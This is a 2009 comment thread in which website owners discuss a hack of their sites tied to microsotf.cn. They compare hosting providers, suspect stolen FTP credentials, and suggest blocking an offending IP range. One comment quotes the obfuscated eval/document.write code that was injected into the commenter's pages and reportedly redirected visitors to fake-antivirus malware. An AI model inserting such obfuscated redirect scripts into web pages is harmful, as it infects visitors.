Comments on: Website hack – microsotf.cn – WordPress

By: Matt

Matt — Tue, 14 Jul 2009 11:44:25 +0000

I read about the ftp passwords. I don’t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don’t think FTP passwords are the only way in.

By: Rob

Rob — Tue, 14 Jul 2009 05:43:49 +0000

Happened to me too – 5 sites taken out. For the second time. If you don’t mind, what host are you using? I’m using 1and1.com. I’m wondering if there’s a commonality amongst us.

It’s been suggested from other sites in my research that they may be using your own ftp software by stealing your saved usernames and passwords. Not sure if that’s how they’re getting in to our servers so easy but it couldn’t hurt to save them in a separate encrypted file. Some also say that it doesn’t matter if you save them with the ftp client or not since they’ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.

By: A&C Enterprise (Allen)

A&C Enterprise (Allen) — Sat, 11 Jul 2009 12:54:41 +0000

http://rockymountainenvironmental.com/
07/04/09 — 8:16am
Altered files: index.htm, index.html, default.asp, main.html
Offending Code: document.write(“‘);document.write(“‘);document.write(“”);
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

07/09/09 — 6:11AM
NEW OFFENDING CODE
eval(“d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&](‘(&@)&]‘$^!%)$[[^@&;[@&%^".replace(/$\&\@$\&\]|\$\^\!\%|$\(\*$\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))
This redirect bypassed my script calls and proceeded to download malware.
Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don’t have access or admin rights to .htaccess. Best of luck to all.
(Allen)

By: pissedoff

pissedoff — Fri, 10 Jul 2009 00:27:50 +0000

Cool – contacted host and advised them – thanks heaps for the I.P range was a great help … lets hope my host are as helpful.

Cheers

By: Matt

Matt — Thu, 09 Jul 2009 14:33:06 +0000

Contact your server administrator (in my case my shared hosting companies) and let them know what’s going on. If they’re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37 ) or better yet, the entire range: 91.212.*.*

My host is awesome – Glitterhost – servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.